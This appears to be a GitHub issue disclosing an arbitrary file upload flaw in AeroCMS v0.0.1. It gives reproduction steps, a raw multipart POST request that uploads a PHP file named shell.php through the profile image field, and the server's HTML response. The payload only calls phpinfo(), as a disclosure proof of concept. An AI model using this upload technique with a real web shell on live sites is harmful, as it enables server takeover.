AeroCMS
AeroCMS copied to clipboard
MegaTKC
An arbitrary file upload vulnerability was found
Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.
Step to Reproduct
After entering the background of website management, click "Profile" to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists.
We create a new webshell file and name it shell.php :
<?php phpinfo(); ?>
Next, we select the file and click "Updae Profile" to upload the file
When upload success access '/images/shell.php'
We can see that the file was successfully uploaded and executed
Vulnerable Code
No file checking before uploading
POC
Injection Point
-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_image"; filename="shell.php" Content-Type: image/jpeg
Request
POST /admin/profile.php HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050 Content-Length: 1109 Origin: http://127.0.0.1:8080 Connection: close Referer: http://127.0.0.1:8080/admin/profile.php Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3 Upgrade-Insecure-Requests: 1
-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="username"
1111 -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="password"
123.com -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_firstname"
-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_lastname"
-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_email"
-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_image"; filename="shell.php" Content-Type: image/jpeg
test is test
<?php phpinfo();?>-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_role"Subscriber -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="update_user"
Update Profile -----------------------------423983190532431556521178267050--
response
HTTP/1.1 200 OK Date: Wed, 10 Aug 2022 02:45:01 GMT Server: Apache/2.4.10 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 8474 Connection: close Content-Type: text/html; charset=UTF-8
<meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <title>AeroCMS Admin Panel</title> <!-- Bootstrap Core CSS --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Custom CSS --> <link href="css/sb-admin.css" rel="stylesheet"> <!-- Custom Fonts --> <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> <link rel="stylesheet" href="css/styles.css"> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script> <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script> <script src="js/jquery.js"></script><div id="wrapper"> <!-- Navigation --> <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="index.php">AeroCMS</a> </div> <!-- Top Menu Items --> <ul class="nav navbar-right top-nav"> <!-- <li><a href='#'>Users Online: </a></li> --> <li><a href='#'>Users Online: <span class="usersonline"></span></a></li> <li><a href="../index.php">View Site</a></li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i> <b class="caret"></b></a> <ul class="dropdown-menu"> <li> <a href="#"><i class="fa fa-fw fa-user"></i> Profile</a> </li> <li class="divider"></li> <li> <a href="../includes/logout.php"><i class="fa fa-fw fa-power-off"></i> Log Out</a> </li> </ul> </li> </ul> <!-- Sidebar Menu Items - These collapse to the responsive navigation menu on small screens --> <div class="collapse navbar-collapse navbar-ex1-collapse"> <ul class="nav navbar-nav side-nav"> <li> <a href="index.php"><i class="fa fa-fw fa-dashboard"></i> Dashboard</a> </li> <li> <a href="javascript:;" data-toggle="collapse" data-target="#posts_dropdown"><i class="fa fa-fw fa-arrows-v"></i> Posts <i class="fa fa-fw fa-caret-down"></i></a> <ul id="posts_dropdown" class="collapse"> <li> <a href="./posts.php">View All Posts</a> </li> <li> <a href="./posts.php?source=add_post">Add Posts</a> </li> </ul> </li> <li> <a href="./categories.php"><i class="fa fa-fw fa-wrench"></i> Categories</a> </li> <li> <a href="./comments.php"><i class="fa fa-fw fa-file"></i> Comments</a> </li> <li> <a href="javascript:;" data-toggle="collapse" data-target="#users"><i class="fa fa-fw fa-arrows-v"></i> Users <i class="fa fa-fw fa-caret-down"></i></a> <ul id="users" class="collapse"> <li> <a href="./users.php">View All Users</a> </li> <li> <a href="./users.php?source=add_user">Add User</a> </li> </ul> </li> <li> <a href="./profile.php"><i class="fa fa-fw fa-file"></i> Profile</a> </li> </ul> </div> <!-- /.navbar-collapse --> </nav> <div id="page-wrapper"> <div class="container-fluid"> <!-- Page Heading --> <div class="row"> <div class="col-lg-12"> <h1 class="page-header"> Welcome to the Admin Panel, <small>!</small> </h1> <form action="" method="post" enctype="multipart/form-data"> <div class="form-group"> <label for="username">Username</label> <input type="text" name="username" value="1111" class="form-control"> </div> <div class="form-group"> <label for="password">Password</label> <input type="password" name="password" value="123.com" class="form-control"> </div> <div class="form-group"> <label for="user_firstname">Firstname</label> <input type="text" name="user_firstname" value="" class="form-control"> </div> <div class="form-group"> <label for="user_lastname">Lastname</label> <input type="text" name="user_lastname" value="" class="form-control"> </div> <div class="form-group"> <label for="user_email">Email</label> <input type="email" name="user_email" value="" class="form-control"> </div> <div class="form-group"> <label for="user_image">Image</label> <img class="img-responsive" width="200" src="../images/test2.php" alt=""> <input type="file" name="user_image" class="form-control"> </div> <div class="form-group"> <select name="user_role" class="form-control"> <option value="Subscriber">Subscriber</option> <option value='Admin'>Admin</option> </select> </div> <div class="form-group"> <input type="submit" value="Update Profile" name="update_user" class="btn btn-primary"> </div> </form> </div> </div> <!-- /.row --> </div> <!-- /.container-fluid --> </div> <!-- /#page-wrapper --> </div> <!-- /#wrapper -->
I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply
